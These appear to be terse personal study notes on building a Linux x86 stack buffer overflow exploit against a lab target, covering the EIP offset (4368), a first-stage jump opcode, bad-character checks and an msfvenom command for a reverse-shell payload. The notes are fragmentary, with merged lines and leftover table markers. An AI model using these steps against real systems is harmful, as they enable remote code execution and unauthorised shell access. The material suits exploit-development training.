Linux Buffer Overflow
DEP (data execution prevention), ASLR, Canaries
replicating the crash
controlling EIP
find the eip location, use msf-pattern_create
msf-pattern_create -l 4379
eip = 0x46367046msf-pattern_offset -q 46367046
-q, –query Aa0A Query to Locate
offset = 4368
crash = “\x41” * 4368 + “B” * 4 + “C” * 7
locating space for shell code
find a register that point to our buffer:
esp point to the end of our buffer, only have 7 bytes remaining in the buffer, increase buffer size not work, lead to another crash
eax point to the start of the buffer, including the “setup sound” string
right click -> go to expression (setup sound)
“se” -> translate to jae
jump short if above or equal
“tu” -> je
jump if equal
not good
insert first stage shell code at the 7 bytes space
use to allain eax to point to string after setup sound, then jump to there
increase eax+12 as there are 12 chars in “setup sound”
1 | kali@kali:~$ msf-nasm_shell |
5 bytes instructions 83C00C FFE0
1 | padding = "\x41" * 4368 |
checking for bad chars
We sent the whole range of characters from 00 to FF within our buffer and then monitored
whether any of those bytes got mangled, swapped, dropped, or changed in memory once they
were processed by the application.
0x00 0x20
finding a return address
edb Plugins -> OpcodeSearcher
getting a shell
1 | msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=443 -b "\x00\x20" -f py -v shellcode |
the output format with
-f, and the variable name to use with -v.
shell is stucked, because of debugger